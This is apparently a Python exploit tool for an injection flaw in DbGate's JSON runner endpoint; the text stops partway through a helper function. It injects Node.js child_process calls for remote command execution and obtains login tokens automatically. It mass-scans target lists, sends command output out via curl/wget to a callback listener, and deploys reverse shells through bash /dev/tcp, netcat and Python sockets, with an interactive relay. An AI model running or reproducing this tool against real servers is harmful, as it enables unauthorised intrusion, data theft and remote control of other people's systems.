#!/usr/bin/env python3 # -*- coding: utf-8 -*- # By: Nxploited # # DbGate JSON runner assessment tool (POST /runners/start injection checks) # Patched in DbGate v7.1.9+. For authorized security testing only. from __future__ import annotations import argparse import asyncio import base64 import json import os import re import socket import sys import threading import time from dataclasses import dataclass from http.server import BaseHTTPRequestHandler, HTTPServer from typing import Any, Dict, List, Optional, Set, Tuple from urllib.parse import parse_qs, quote, urljoin, urlparse, urlunparse import aiohttp from colorama import Fore, Style, init as color_init color_init(autoreset=True) OUT_DIR = "Nx" OUT_VULN = "" OUT_DISPATCH = "" OUT_REVSH = "" OUT_EXFIL = "" OUT_FAIL = "" OUT_LIST_REPORT = "" OUT_SUMMARY = "" SESSION_DIR = "" SESSION_ID = "" DEFAULT_TARGETS = "list.txt" APP_NAME = "dbgate" DEFAULT_PORT = 3000 # DbGate default HTTP port DEFAULT_CONCURRENCY = 30 DEFAULT_TIMEOUT = 15.0 DEFAULT_CALLBACK_PORT = 8888 DEFAULT_REVSH_PORT = 4444 # ── logging ────────────────────────────────────────────────────────────────── def log_ok(msg: str) -> None: print(f"{Fore.GREEN}[+] {msg}{Style.RESET_ALL}") def log_info(msg: str) -> None: print(f"{Fore.CYAN}[*] {msg}{Style.RESET_ALL}") def log_warn(msg: str) -> None: print(f"{Fore.YELLOW}[!] 
{msg}{Style.RESET_ALL}") def log_fail(msg: str) -> None: print(f"{Fore.RED}[-] {msg}{Style.RESET_ALL}") def log_pwn(msg: str) -> None: print(f"{Fore.MAGENTA}[★] {msg}{Style.RESET_ALL}") _SAVE_WARNED: Set[str] = set() def save_line(path: str, line: str) -> None: if not path: return try: parent = os.path.dirname(path) if parent: os.makedirs(parent, exist_ok=True) with open(path, "a", encoding="utf-8") as fh: fh.write(line.rstrip() + "\n") fh.flush() except OSError as exc: if path not in _SAVE_WARNED: _SAVE_WARNED.add(path) log_warn(f"Cannot write to {path}: {exc}") def init_nx_output() -> str: """Create Nx/ output tree; call before any scan.""" global OUT_VULN, OUT_DISPATCH, OUT_REVSH, OUT_EXFIL, OUT_FAIL, OUT_LIST_REPORT, OUT_SUMMARY global SESSION_DIR, SESSION_ID os.makedirs(OUT_DIR, exist_ok=True) os.makedirs(os.path.join(OUT_DIR, "exfil"), exist_ok=True) SESSION_ID = time.strftime("%Y%m%d_%H%M%S") SESSION_DIR = os.path.join(OUT_DIR, "sessions", SESSION_ID) os.makedirs(SESSION_DIR, exist_ok=True) OUT_VULN = os.path.join(OUT_DIR, "vuln.txt") OUT_DISPATCH = os.path.join(OUT_DIR, "dispatch.txt") OUT_REVSH = os.path.join(OUT_DIR, "revsh.txt") OUT_EXFIL = os.path.join(OUT_DIR, "exfil.txt") OUT_FAIL = os.path.join(OUT_DIR, "failed.txt") OUT_LIST_REPORT = os.path.join(OUT_DIR, "list_report.txt") OUT_SUMMARY = os.path.join(SESSION_DIR, "summary.json") for p in (OUT_VULN, OUT_DISPATCH, OUT_REVSH, OUT_EXFIL, OUT_FAIL): open(p, "a", encoding="utf-8").close() log_ok(f"Output folder: {os.path.abspath(OUT_DIR)}/") log_info(f"Session: {SESSION_ID}") return SESSION_DIR def exfil_target_key(target_url: str) -> str: """Canonical key for per-target exfil matching (mass-safe).""" if not target_url or target_url == "unknown": return "unknown" return ensure_target_url(target_url).rstrip("/") def nx_exfil_path(target_url: str) -> str: tag = re.sub(r"[^\w.\-]+", "_", urlparse(target_url).netloc or "target") return os.path.join(OUT_DIR, "exfil", f"{tag}.txt") def 
save_exfil_for_target(target_url: str, peer: str, decoded: str) -> None: line = f"[{time.strftime('%Y-%m-%d %H:%M:%S')}] peer={peer}\n{decoded}\n{'─' * 40}" save_line(OUT_EXFIL, f"[{target_url}] {decoded[:500]}") save_line(nx_exfil_path(target_url), line) def url_tag(url: str) -> str: return urlparse(url).netloc or url # ── URL / targets ──────────────────────────────────────────────────────────── def normalize_base(url: str) -> str: url = url.strip() if not url: return "" if not re.match(r"^https?://", url, re.I): url = "http://" + url return url.rstrip("/") def ensure_target_url(raw: str, default_port: int = DEFAULT_PORT) -> str: """ Build a valid base URL: scheme://host:port/path Never appends port after path (fixes http://host/path:3000 bug). """ raw = normalize_base(raw) if not raw: return "" p = urlparse(raw) scheme = (p.scheme or "http").lower() host = p.hostname if not host: return "" if p.port is not None: port = p.port else: # DbGate default when line has no explicit port (http or https) port = default_port path = p.path or "" if path == "/": path = "" netloc = f"{host}:{port}" return urlunparse((scheme, netloc, path, "", p.query, p.fragment)) def load_targets_raw(path: str) -> List[str]: out: List[str] = [] try: with open(path, "r", encoding="utf-8") as fh: for line in fh: out.append(line.rstrip("\n\r")) except OSError as exc: log_fail(f"Cannot read targets: {exc}") return out @dataclass class ListLoadStats: raw: int = 0 blank: int = 0 comment: int = 0 invalid: int = 0 dup: int = 0 resolved: int = 0 def parse_target_line( line: str, default_port: int = DEFAULT_PORT, ) -> Tuple[Optional[str], str, str]: """ Returns (url, per_target_command, reason). Supports: host, host:port, URL, host/path, and optional |command per line. 
""" original = line per_cmd = "" work = line.strip() if not work: return None, "", "blank" if work.startswith("#"): return None, "", "comment" if "|" in work: host_part, _, cmd_part = work.partition("|") work = host_part.strip() per_cmd = cmd_part.strip() line = work if not re.match(r"^https?://", line, re.I): if re.match(r"^[\d.a-zA-Z_-]+:\d+", line) and "/" not in line.split(":")[0]: line = f"http://{line}" elif re.match(r"^[\d.a-zA-Z_.-]+(:\d+)?/", line): if not line.startswith("http"): line = f"http://{line}" elif re.match(r"^[\w.\-]+$", line) or re.match(r"^\d{1,3}(\.\d{1,3}){3}$", line): line = f"http://{line}" else: line = f"http://{line}" url = ensure_target_url(line, default_port) if not url or not urlparse(url).hostname: return None, per_cmd, f"invalid:{original[:80]}" return url, per_cmd, "" def load_targets_smart( path: str, default_port: int = DEFAULT_PORT, ) -> Tuple[List[str], Dict[str, str], ListLoadStats, List[str]]: """Load list file with stats; never mixes ports incorrectly.""" lines = load_targets_raw(path) stats = ListLoadStats(raw=len(lines)) seen: Set[str] = set() urls: List[str] = [] per_cmds: Dict[str, str] = {} errors: List[str] = [] for line in lines: if not line.strip(): stats.blank += 1 continue if line.strip().startswith("#"): stats.comment += 1 continue url, per_cmd, reason = parse_target_line(line, default_port) if reason == "blank": stats.blank += 1 continue if reason == "comment": stats.comment += 1 continue if not url: stats.invalid += 1 errors.append(f"{line.strip()} -> {reason}") continue if url in seen: stats.dup += 1 continue seen.add(url) urls.append(url) if per_cmd: per_cmds[url] = per_cmd stats.resolved += 1 return urls, per_cmds, stats, errors def write_list_report( path: str, stats: ListLoadStats, urls: List[str], errors: List[str], default_port: int = DEFAULT_PORT, per_cmds: Optional[Dict[str, str]] = None, ) -> None: lines = [ f"file={path}", f"raw={stats.raw} blank={stats.blank} comment={stats.comment}", 
f"invalid={stats.invalid} dup={stats.dup} resolved={stats.resolved}", f"default_port={default_port} (applied when line has no explicit port)", "", "=== resolved targets ===", ] for u in urls: cmd = (per_cmds or {}).get(u, "") lines.append(f"{u}|{cmd}" if cmd else u) if errors: lines.extend(["", "=== invalid lines ==="]) lines.extend(errors) try: with open(OUT_LIST_REPORT, "w", encoding="utf-8") as fh: fh.write("\n".join(lines) + "\n") except OSError as exc: log_warn(f"Cannot write list report: {exc}") def parse_login_json(raw: Optional[str]) -> Tuple[Optional[Dict[str, Any]], Optional[str]]: if not raw or not raw.strip(): return {"amoid": "none"}, None try: data = json.loads(raw) if not isinstance(data, dict): return None, "login JSON must be an object" return data, None except json.JSONDecodeError as exc: return None, f"invalid login JSON: {exc}" def guess_lan_ip() -> str: try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("8.8.8.8", 80)) ip = s.getsockname()[0] s.close() return ip except OSError: return "127.0.0.1" def extract_bearer_token(data: Any, raw_text: str = "") -> Optional[str]: """Pull Bearer token from DbGate /auth/login JSON (several response shapes).""" if isinstance(data, dict): for key in ("accessToken", "token", "access_token", "jwt", "bearer"): val = data.get(key) if val and isinstance(val, str): return val for nest in ("data", "result", "user", "session", "auth"): sub = data.get(nest) if isinstance(sub, dict): found = extract_bearer_token(sub) if found: return found if raw_text: for pattern in ( r'"accessToken"\s*:\s*"([^"]+)"', r'"token"\s*:\s*"([^"]+)"', r'"access_token"\s*:\s*"([^"]+)"', ): m = re.search(pattern, raw_text) if m: return m.group(1) return None class ReuseHTTPServer(HTTPServer): allow_reuse_address = True # ── injection builders ───────────────────────────────────────────────────────── def _js_escape_single(s: str) -> str: return ( s.replace("\\", "\\\\") .replace("'", "\\'") .replace("\n", "\\n") 
.replace("\r", "\\r") ) def parse_revsh_endpoint( spec: Optional[str], default_port: int = DEFAULT_REVSH_PORT, ) -> Tuple[str, int]: """ Parse LHOST:LPORT for reverse shell (address the *target* must dial). spec None / AUTO → guessed LAN IP + default_port. """ if spec is None or str(spec).strip().upper() == "AUTO" or not str(spec).strip(): return guess_lan_ip(), default_port raw = str(spec).strip() if raw.startswith("[") and "]" in raw: host = raw[1 : raw.index("]")] rest = raw[raw.index("]") + 1 :] if rest.startswith(":"): return host, int(rest[1:]) return host, default_port if ":" in raw: host, _, port_s = raw.rpartition(":") host = host.strip() if not host: raise ValueError(f"invalid reverse-shell endpoint: {spec!r}") return host, int(port_s) return raw, default_port def build_reverse_shell_cmd(lhost: str, lport: int) -> str: """ Detached reverse-shell attempts (async exec). Uses base64-wrapped script to avoid broken nested quoting inside sh -c. """ h, p = lhost, int(lport) script = ( f"bash -i >& /dev/tcp/{h}/{p} 0>&1 2>/dev/null || " f"sh -i >& /dev/tcp/{h}/{p} 0>&1 2>/dev/null || " f"rm -f /tmp/.nx;mkfifo /tmp/.nx;cat /tmp/.nx|sh -i 2>&1|nc {h} {p} >/tmp/.nx || " f"nc -e /bin/sh {h} {p} 2>/dev/null || " f"busybox nc {h} {p} -e sh 2>/dev/null || " f"python3 -c \"import socket,os,subprocess;" f"s=socket.socket();s.connect(('{h}',{p}));" f"os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);" f"subprocess.call(['/bin/sh','-i'])\" 2>/dev/null" ) payload_b64 = base64.b64encode(script.encode()).decode() return ( f"(command -v base64 >/dev/null 2>&1 && " f"echo {payload_b64}|base64 -d|nohup sh >/dev/null 2>&1 &) || " f"(echo {payload_b64}|openssl base64 -d|nohup sh >/dev/null 2>&1 &)" ) def build_node_exec_js(shell_cmd: str, sync: bool = True) -> str: esc = _js_escape_single(shell_cmd) if sync: return ( f"process.mainModule.require('child_process').execSync('{esc}'," f"{{encoding:'utf8',timeout:120000}})" ) return 
f"process.mainModule.require('child_process').exec('{esc}')" def build_shell_exfil( cmd: str, callback_url: str, b64: bool = True, target_tag: str = "", ) -> str: base = callback_url.rstrip("/") qs_parts: List[str] = [] if target_tag: qs_parts.append(f"target={quote(target_tag, safe='')}") cb_full = f"{base}?{'&'.join(qs_parts)}" if qs_parts else base # Run command once, encode once, then try curl then wget (no double exec). if b64: return ( f"__nx=$( ({cmd}) 2>&1 ); " f"b64=$(printf %s \"$__nx\" | base64 -w0 2>/dev/null " f"|| printf %s \"$__nx\" | base64 2>/dev/null || echo FAIL); " f"curl -sk -G '{cb_full}' --data-urlencode \"data=$b64\" " f"|| wget -qO- --post-data=\"data=$b64\" '{cb_full}'" ) return ( f"__nx=$( ({cmd}) 2>&1 ); " f"curl -sk -G '{cb_full}' --data-urlencode \"data=$__nx\" " f"|| wget -qO- --post-data=\"data=$__nx\" '{cb_full}'" ) def inject_function_name(node_js: str) -> str: return f"x;{node_js};//" def inject_variable_name(node_js: str, fn_safe: str = "x") -> Tuple[str, str]: return f"x;{node_js};var __nx", f"{fn_safe};//" def build_json_script( vector: str, node_js: str, props: Optional[Dict[str, Any]] = None, ) -> Dict[str, Any]: props = props or {} if vector == "functionName": return { "type": "json", "commands": [{ "type": "assign", "variableName": "x", "functionName": inject_function_name(node_js), "props": props, }], "packageNames": [], } if vector == "variableName": var_name, fn_name = inject_variable_name(node_js) return { "type": "json", "commands": [{ "type": "assign", "variableName": var_name, "functionName": fn_name, "props": props, }], "packageNames": [], } raise ValueError(f"Unknown vector: {vector}") # ── exfil listener ─────────────────────────────────────────────────────────── class ExfilHandler(BaseHTTPRequestHandler): hits: List[str] = [] hits_by_target: Dict[str, List[str]] = {} _lock = threading.Lock() @classmethod def hit_count(cls) -> int: with cls._lock: return len(cls.hits) @classmethod def hits_for_target(cls, 
target_url: str, baseline: int = 0) -> int: key = exfil_target_key(target_url) with cls._lock: entries = cls.hits_by_target.get(key, []) return max(0, len(entries) - baseline) def log_message(self, fmt: str, *args: Any) -> None: pass def _parse_request(self) -> Tuple[str, str, str]: peer = self.client_address[0] parsed = urlparse(self.path) qs = parse_qs(parsed.query) target_key = qs.get("target", [""])[0] if self.command == "POST": length = int(self.headers.get("Content-Length", 0)) body = self.rfile.read(length).decode("utf-8", errors="replace") bqs = parse_qs(body) raw = bqs.get("data", [body])[0] if not target_key: target_key = bqs.get("target", [""])[0] return raw, target_key, peer raw = qs.get("data", [""])[0] return raw, target_key, peer def do_GET(self) -> None: self._handle() def do_POST(self) -> None: self._handle() def _handle(self) -> None: raw, target_key, peer = self._parse_request() decoded = raw try: decoded = base64.b64decode(raw).decode("utf-8", errors="replace") except Exception: pass target_url = target_key or "unknown" line = ( f"[{time.strftime('%H:%M:%S')}] peer={peer} " f"target={target_url} | {decoded[:8000]}" ) store_key = exfil_target_key(target_url) if target_url != "unknown" else "unknown" with ExfilHandler._lock: ExfilHandler.hits.append(line) ExfilHandler.hits_by_target.setdefault(store_key, []).append(decoded) log_pwn(f"EXFIL [{target_url}] from {peer}: {decoded[:200]!r}") if target_url and target_url != "unknown": save_exfil_for_target(target_url, peer, decoded) else: save_line(OUT_EXFIL, line) self.send_response(200) self.send_header("Content-Type", "text/plain") self.end_headers() self.wfile.write(b"ok") def start_exfil_server( bind_host: str, port: int, max_tries: int = 25, ) -> Tuple[HTTPServer, int]: """ Start HTTP exfil listener. If port is busy (e.g. 4444 = msf), try next ports. 
""" bind = bind_host if bind_host else "0.0.0.0" last_err: Optional[OSError] = None for offset in range(max_tries): try_port = port + offset try: srv = ReuseHTTPServer((bind, try_port), ExfilHandler) threading.Thread(target=srv.serve_forever, daemon=True).start() if try_port != port: log_warn(f"Port {port} busy — listener using {try_port} instead") log_ok(f"Exfil listener bound on {bind}:{try_port}") return srv, try_port except OSError as exc: last_err = exc if getattr(exc, "errno", None) not in (48, 98, 10048): raise continue raise OSError( f"Could not bind {bind}:{port}-{port + max_tries - 1}: {last_err}" ) class TcpRevshListener: """TCP listener to verify reverse-shell connectivity from the target.""" def __init__(self, bind_host: str = "0.0.0.0", port: int = DEFAULT_REVSH_PORT) -> None: self.bind_host = bind_host or "0.0.0.0" self.port = port self._sock: Optional[socket.socket] = None self._conn: Optional[socket.socket] = None self.peer: Tuple[str, int] = ("", 0) self.banner: bytes = b"" def start(self, max_tries: int = 25) -> int: bind = self.bind_host last_err: Optional[OSError] = None for offset in range(max_tries): try_port = self.port + offset sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) try: sock.bind((bind, try_port)) sock.listen(1) self._sock = sock if offset > 0: log_warn( f"Revsh port {self.port} busy — listening on {try_port} instead" ) self.port = try_port log_ok(f"Reverse-shell listener on {bind}:{try_port}") return try_port except OSError as exc: last_err = exc sock.close() if getattr(exc, "errno", None) not in (48, 98, 10048): raise continue raise OSError( f"Could not bind revsh {bind}:{self.port}-{self.port + max_tries - 1}: {last_err}" ) def wait(self, timeout: float) -> bool: if not self._sock: return False self._sock.settimeout(timeout) try: conn, addr = self._sock.accept() self._conn = conn self.peer = (addr[0], addr[1]) conn.settimeout(2.0) try: self.banner = 
conn.recv(4096) except OSError: self.banner = b"" return True except socket.timeout: return False except OSError: return False def relay_interactive(self) -> None: """Best-effort line bridge after connect (use external nc for full TTY).""" conn = self._conn if not conn: return def _reader() -> None: while True: try: data = conn.recv(4096) if not data: break sys.stdout.write(data.decode("utf-8", errors="replace")) sys.stdout.flush() except OSError: break threading.Thread(target=_reader, daemon=True).start() log_info("Interactive relay — type commands; Ctrl+C to exit") try: while True: line = input() conn.sendall((line + "\n").encode()) except (EOFError, KeyboardInterrupt, OSError): pass def close(self) -> None: for s in (self._conn, self._sock): if s: try: s.close() except OSError: pass self._conn = None self._sock = None async def wait_revsh_async(listener: TcpRevshListener, timeout: float) -> bool: loop = asyncio.get_running_loop() return await loop.run_in_executor(None, listener.wait, timeout) def build_callback_url( callback_host: str, listen_port: int, scheme: str = "http", ) -> str: host = callback_host.strip() if not host: host = guess_lan_ip() if host in ("0.0.0.0", "::"): log_warn("Callback host cannot be 0.0.0.0 — use an IP reachable FROM the target") host = guess_lan_ip() log_info(f"Using guessed LAN IP for callback: {host}") return f"{scheme}://{host}:{listen_port}/" # ── DbGate client ────────────────────────────────────────────────────────────── class DbGateExploit: VECTORS = ("functionName", "variableName", "both") def __init__( self, base_url: str, timeout: float = DEFAULT_TIMEOUT, verify_ssl: bool = False, token: Optional[str] = None, login_body: Optional[Dict[str, Any]] = None, ): self.base_url = ensure_target_url(base_url) self.timeout = aiohttp.ClientTimeout(total=timeout) self.verify_ssl = verify_ssl self.token = token self.login_body = login_body or {"amoid": "none"} self.tag = urlparse(self.base_url).netloc or self.base_url 
self.last_vector_used = "" def _headers(self, with_auth: bool = True) -> Dict[str, str]: h = {"Content-Type": "application/json", "Accept": "application/json"} if with_auth and self.token: h["Authorization"] = f"Bearer {self.token}" return h async def _request( self, session: aiohttp.ClientSession, method: str, path: str, **kwargs: Any, ) -> Tuple[int, str, Any]: url = urljoin(self.base_url + "/", path.lstrip("/")) try: async with session.request( method, url, ssl=self.verify_ssl, timeout=self.timeout, **kwargs ) as resp: text = await resp.text() try: data = json.loads(text) if text.strip() else {} except json.JSONDecodeError: data = {"_raw": text} return resp.status, text, data except asyncio.TimeoutError: return 0, "timeout", {} except aiohttp.ClientError as exc: return 0, str(exc), {} async def probe_alive(self, session: aiohttp.ClientSession) -> bool: for path in ("/", "/api/status", "/status"): status, _, _ = await self._request(session, "GET", path) if status in (200, 401, 403, 404, 302): return True return False async def obtain_token(self, session: aiohttp.ClientSession) -> bool: if self.token: return True status, text, data = await self._request( session, "POST", "/auth/login", json=self.login_body, headers={"Content-Type": "application/json"}, ) if status != 200: log_fail(f"[{self.tag}] auth/login HTTP {status}: {text[:120]}") return False token = extract_bearer_token(data, text) if not token: log_fail( f"[{self.tag}] no token in login response " f"(HTTP {status}): {text[:160]}" ) return False self.token = token preview = token if len(token) < 24 else f"{token[:20]}...{token[-6:]}" log_ok(f"[{self.tag}] Bearer token auto-obtained ({preview})") return True async def runners_start( self, session: aiohttp.ClientSession, script: Dict[str, Any], ) -> Tuple[bool, Optional[str], str]: status, text, data = await self._request( session, "POST", "/runners/start", json={"script": script}, headers=self._headers(True), ) if status != 200: return False, None, f"HTTP 
{status}: {text[:200]}" if isinstance(data, dict) and data.get("errorMessage"): return False, None, str(data["errorMessage"]) runid = None if isinstance(data, dict): runid = data.get("runid") or data.get("runId") if runid or "runid" in text.lower(): return True, str(runid or "?"), text return False, None, text[:300] async def run_injection( self, session: aiohttp.ClientSession, vector: str, node_js: str, props: Optional[Dict[str, Any]] = None, ) -> Tuple[bool, Optional[str], str]: if vector == "both": ok, rid, err = await self.run_injection( session, "functionName", node_js, props ) if ok: self.last_vector_used = "functionName" return ok, rid, err ok, rid, err = await self.run_injection( session, "variableName", node_js, props ) if ok: self.last_vector_used = "variableName" return ok, rid, err self.last_vector_used = vector script = build_json_script(vector, node_js, props) return await self.runners_start(session, script) async def check_vulnerable( self, session: aiohttp.ClientSession, vector: str = "functionName", ) -> Tuple[bool, str]: probe_js = "void 0" ok, runid, err = await self.run_injection(session, vector, probe_js) if ok: v = self.last_vector_used or vector return True, f"runner-accepted vector={v} runid={runid}" return False, err async def execute_command( self, session: aiohttp.ClientSession, command: str, callback_url: Optional[str] = None, vector: str = "functionName", async_exec: bool = False, b64_exfil: bool = True, ) -> Tuple[bool, str]: shell = ( build_shell_exfil( command, callback_url, b64=b64_exfil, target_tag=self.base_url, ) if callback_url else command ) node_js = build_node_exec_js(shell, sync=not async_exec) ok, runid, err = await self.run_injection(session, vector, node_js) if ok: v = self.last_vector_used or vector return True, f"dispatched vector={v} runid={runid}" return False, err async def full_chain( self, command: str, callback_url: Optional[str] = None, vector: str = "functionName", check_only: bool = False, async_exec: bool = 
False, b64_exfil: bool = True, wait_exfil: float = 8.0, target_exfil_baseline: int = 0, use_reverse_shell: bool = False, wait_revsh: float = 15.0, revsh_listener: Optional[TcpRevshListener] = None, revsh_interactive: bool = False, ) -> str: """ fail — unreachable / auth fail / not vulnerable vuln — runner accepts injection probe (or exec without callback) dispatch — payload accepted; no confirmed output / no revsh connect exfil — callback received new data after dispatch (confirmed output) revsh — TCP reverse connection received on local listener """ connector = aiohttp.TCPConnector(ssl=self.verify_ssl, limit=1) async with aiohttp.ClientSession(connector=connector) as session: if not await self.probe_alive(session): log_fail(f"[{self.tag}] target not reachable") return "fail" if not await self.obtain_token(session): return "fail" vuln, detail = await self.check_vulnerable(session, vector) if not vuln: log_fail(f"[{self.tag}] not vulnerable / blocked: {detail}") return "fail" log_ok(f"[{self.tag}] VULNERABLE ({detail})") save_line(OUT_VULN, f"{self.base_url}|{detail}") if check_only: return "vuln" if not command: return "vuln" exec_async = async_exec or use_reverse_shell exec_cb = None if use_reverse_shell else callback_url ok, msg = await self.execute_command( session, command, callback_url=exec_cb, vector=vector, async_exec=exec_async, b64_exfil=b64_exfil, ) if not ok: log_fail(f"[{self.tag}] exec failed: {msg}") return "vuln" log_pwn(f"[{self.tag}] {msg}") out_file = OUT_REVSH if use_reverse_shell else OUT_DISPATCH save_line( out_file, f"{self.base_url}|cmd={command!r}|callback={callback_url or ''}|{msg}", ) if use_reverse_shell: if not revsh_listener: log_warn(f"[{self.tag}] no revsh listener — cannot verify connection") return "dispatch" log_info( f"[{self.tag}] waiting up to {wait_revsh:.0f}s for reverse TCP..." 
) if await wait_revsh_async(revsh_listener, wait_revsh): peer = f"{revsh_listener.peer[0]}:{revsh_listener.peer[1]}" log_ok(f"[{self.tag}] reverse TCP connected from {peer}") if revsh_listener.banner: preview = revsh_listener.banner[:200] log_info(f" banner: {preview!r}") save_line( OUT_REVSH, f"{self.base_url}|peer={peer}|{msg}", ) if revsh_interactive: revsh_listener.relay_interactive() return "revsh" log_warn( f"[{self.tag}] payload dispatched but no reverse TCP " f"(firewall/Docker/no bash|nc; target must reach listener)" ) return "dispatch" if not callback_url: log_warn(f"[{self.tag}] no callback — blind dispatch only (not confirmed output)") return "vuln" got = await wait_for_exfil( wait_exfil, self.base_url, target_exfil_baseline, ) if got: log_ok(f"[{self.tag}] output received via callback") log_info(f" → {nx_exfil_path(self.base_url)}") return "exfil" log_warn( f"[{self.tag}] payload dispatched but no callback data " f"(check firewall/NAT/curl on target; callback={callback_url})" ) return "dispatch" # ── scan ─────────────────────────────────────────────────────────────────────── def exfil_received_for_target(target_url: str, target_baseline: int) -> bool: """True only if this target URL received new exfil (mass-safe, no global bleed).""" return ExfilHandler.hits_for_target(target_url, target_baseline) > 0 async def wait_for_exfil( wait_sec: float, target_url: str, target_baseline: int, poll_sec: float = 0.5, ) -> bool: """Poll until callback data arrives for this target only.""" if wait_sec <= 0: return exfil_received_for_target(target_url, target_baseline) deadline = time.monotonic() + wait_sec while True: if exfil_received_for_target(target_url, target_baseline): return True remaining = deadline - time.monotonic() if remaining <= 0: return False await asyncio.sleep(min(poll_sec, remaining)) def describe_result(result: str) -> str: return { "fail": "unreachable / auth failed / not vulnerable", "vuln": "runner accepted probe (no command output)", 
"dispatch": "payload accepted — no callback/revsh confirmation", "exfil": "callback received — command output confirmed", "revsh": "reverse TCP connection received (use --revsh-interactive for basic relay)", }.get(result, result) async def scan_one( target: str, command: str, callback_url: Optional[str], vector: str, check_only: bool, timeout: float, verify_ssl: bool, token: Optional[str], login_body: Optional[Dict[str, Any]], async_exec: bool, b64_exfil: bool, wait_exfil: float, ) -> str: client = DbGateExploit( target, timeout=timeout, verify_ssl=verify_ssl, token=token, login_body=login_body, ) t_key = exfil_target_key(target) with ExfilHandler._lock: t_base = len(ExfilHandler.hits_by_target.get(t_key, [])) try: return await client.full_chain( command=command, callback_url=callback_url, vector=vector, check_only=check_only, async_exec=async_exec, b64_exfil=b64_exfil, wait_exfil=wait_exfil, target_exfil_baseline=t_base, ) except Exception as exc: log_fail(f"[{client.tag}] {exc}") return "fail" async def mass_scan( targets: List[str], command: str, callback_url: Optional[str], vector: str, check_only: bool, concurrency: int, timeout: float, verify_ssl: bool, token: Optional[str], login_body: Optional[Dict[str, Any]], async_exec: bool, b64_exfil: bool, wait_exfil: float, target_commands: Optional[Dict[str, str]] = None, ) -> Dict[str, int]: sem = asyncio.Semaphore(concurrency) stats: Dict[str, int] = { "exfil": 0, "dispatch": 0, "vuln": 0, "fail": 0, } total = len(targets) done = 0 lock = asyncio.Lock() async def worker(t: str) -> None: nonlocal done cmd = (target_commands or {}).get(t) or command async with sem: result = await scan_one( t, cmd, callback_url, vector, check_only, timeout, verify_ssl, token, login_body, async_exec, b64_exfil, wait_exfil, ) async with lock: stats[result] = stats.get(result, 0) + 1 done += 1 pct = done / total * 100 print( f"{Fore.CYAN}[{done:>5}/{total} {pct:5.1f}%] " f"{Fore.MAGENTA}EXFIL={stats['exfil']} " 
f"{Fore.GREEN}DISP={stats['dispatch']} " f"{Fore.YELLOW}VULN={stats['vuln']} " f"{Fore.RED}FAIL={stats['fail']}" f"{Style.RESET_ALL}", end="\r", ) if result == "fail": save_line(OUT_FAIL, t) tasks = [asyncio.create_task(worker(t)) for t in targets] try: await asyncio.gather(*tasks) except KeyboardInterrupt: for t in tasks: t.cancel() print() return stats # ── interactive wizard ─────────────────────────────────────────────────────── def show_banner() -> None: os.system("cls" if os.name == "nt" else "clear") w = 84 print(Fore.MAGENTA + "═" * w + Style.RESET_ALL) print( Fore.WHITE + Style.BRIGHT + " DbGate JSON Runner — Interactive Assessment".center(w) + Style.RESET_ALL ) print(Fore.MAGENTA + "─" * w + Style.RESET_ALL) for line in ( "Mode : AUTO — one question (URL or list file), rest is automatic", "Auto : token · listener · port 3000 · vector=both · output→Nx/", f"Output : {OUT_DIR}/ (vuln · dispatch · exfil · failed · list_report)", "CLI : python Nx.py --cli -u http://host:3000 (full flags)", "Revsh : --cli -u URL --reverse-shell [LHOST:LPORT] (default LAN:4444)", "Note : DbGate >= 7.1.9 is patched", ): print(Fore.CYAN + f" • {line}" + Style.RESET_ALL) print(Fore.GREEN + Style.BRIGHT + " By: Nxploited".center(w) + Style.RESET_ALL) print(Fore.MAGENTA + "═" * w + Style.RESET_ALL) print() def ask(prompt: str, default: str = "") -> str: try: v = input(f"{Fore.CYAN} ▸ {prompt} [{default}]: {Style.RESET_ALL}").strip() return v if v else default except (EOFError, KeyboardInterrupt): return default def ask_yes(prompt: str, default: str = "n") -> bool: v = ask(prompt, default).lower() return v in ("y", "yes", "1", "true") def ask_int(prompt: str, default: int, lo: int = 1, hi: int = 10000) -> int: while True: raw = ask(prompt, str(default)) try: n = int(raw) if lo <= n <= hi: return n except ValueError: pass log_warn(f"Enter a number between {lo} and {hi}") def ask_float(prompt: str, default: float, lo: float = 0.0, hi: float = 600.0) -> float: while True: raw = 
class RunConfig:
    """Mutable bag of every option a run needs.

    Both entry paths (the interactive wizard and ``--cli``) create one
    instance, fill it in, and hand it to ``run_from_config``.  The values
    assigned here are only starting defaults.
    """

    def __init__(self) -> None:
        # Target selection: "single" uses ``url``, "mass" uses ``targets_file``.
        self.mode: str = "single"
        self.url: str = ""
        self.targets_file: str = DEFAULT_TARGETS
        self.default_port: int = DEFAULT_PORT

        # What to run and how to authenticate.
        self.check_only: bool = False
        self.command: str = "id"
        self.vector: str = "functionName"
        self.token: Optional[str] = None
        self.login_json: str = '{"amoid":"none"}'
        self.login_body: Optional[Dict[str, Any]] = None

        # Transport tuning.
        self.threads: int = DEFAULT_CONCURRENCY
        self.timeout: float = DEFAULT_TIMEOUT
        self.verify_ssl: bool = False
        self.async_exec: bool = False

        # Callback / exfil listener.
        self.b64_exfil: bool = True
        self.wait_exfil: float = 8.0
        self.use_callback: bool = True
        self.callback_url: Optional[str] = None
        self.listen_bind: str = "0.0.0.0"
        self.listen_port: int = DEFAULT_CALLBACK_PORT
        self.callback_host: str = ""
        self.use_builtin_listener: bool = True

        # Filled in by preflight_verify().
        self.resolved_targets: List[str] = []
        self.target_commands: Dict[str, str] = {}

        # Reverse-shell mode.
        self.reverse_shell: bool = False
        self.revsh_lhost: str = ""
        self.revsh_lport: int = DEFAULT_REVSH_PORT
        self.revsh_bind: str = "0.0.0.0"
        self.wait_revsh: float = 15.0
        self.revsh_interactive: bool = False

        # Per-target exfil wait used when more than one target is scanned.
        self.mass_wait_exfil: float = 8.0


def detect_target_input(raw: str) -> Tuple[str, str, str]:
    """Classify the wizard's single answer.

    The answer has the form ``TARGET[|COMMAND]`` where ``TARGET`` is either a
    URL/host or a list file (optionally prefixed with ``@``).

    Returns:
        ``(mode, target, command)`` where ``mode`` is ``"mass"`` for a list
        file and ``"single"`` otherwise; ``command`` is ``""`` when no
        ``|COMMAND`` part was given.

    An empty target (``""``, ``"|ls"``, ``"@"``) falls back to the local
    default URL instead of yielding an empty target string.
    """
    default_target = "http://127.0.0.1:3000"

    # Only the first "|" separates target from command, so the command itself
    # may contain shell pipes.
    target, _, cmd = raw.strip().partition("|")
    target = target.strip()
    cmd = cmd.strip()

    if target.startswith("@"):
        target = target[1:].strip()
    if not target:
        return "single", default_target, cmd

